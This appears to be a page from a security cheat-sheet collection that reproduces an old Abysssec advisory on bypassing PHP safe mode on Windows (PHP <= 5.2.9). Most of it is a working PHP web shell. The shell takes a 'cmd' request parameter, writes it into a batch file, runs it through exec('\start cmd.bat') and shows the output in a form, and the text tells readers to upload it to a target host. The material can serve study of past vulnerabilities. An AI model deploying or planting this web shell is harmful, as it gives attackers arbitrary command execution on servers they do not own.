disable_functions bypass - PHP <= 5.2.9 on windows

PHP <= 5.2.9 on windows

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

<?php
//cmd.php
/*
    Abysssec Inc Public Advisory 

    Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
    the problem comes from OS behavior - implement  and interfacing between php
    and operation systems directory structure . the problem is php won't tell difference 
    between directory browsing in linux and windows this can lead attacker to ability 
    execute his / her commands on targert machie even in SafeMod On  (php.ini setting) . 
    =============================================================================
    in linux when you want open a directory for example php directory you need
    to go to /usr/bin/php and you can't use \usr\bin\php . but windows won't tell
    diffence between slash and back slash it means there is no didffrence  between 
    c:\php and c:/php , and this is not vulnerability but itself but  because of this  simple 
    php implement "\" character can escape safemode using  function like excec . 
    here is a PoC for discussed vulnerability . just upload files on your target host and execute
    your commands . 
    ==============================================================================
    note : this vulnerabities is just for educational purpose and author will be not be responsible  
    for any damage using this vulnerabilty. 
    ==============================================================================
    for more information visit Abysssec.com
    feel free to contact me at admin [at] abysssec.com
*/
    $cmd = $_REQUEST['cmd'];
    if ($cmd){
    $batch = fopen ("cmd.bat","w");
    fwrite($batch,"$cmd>abysssec.txt"."\r\n");
    fwrite($batch,"exit");
    fclose($batch);
    exec("\start cmd.bat");
    echo "<center>";
    echo "<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";
    echo "<textarea rows=20 cols=60>";
    require("abysssec.txt");
    echo "</textarea>";
    echo "</center>";
    }
?>

<html>
<body bgcolor=#000000 and text=#DO0000>
<center>
<form method=post>
<input type=text name=cmd >
<input type=submit value=bypass>
</form>
</center>
</body>
</html>
Previousdisable_functions - PHP 5.2.4 ionCube extension ExploitNextdisable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL

Last updated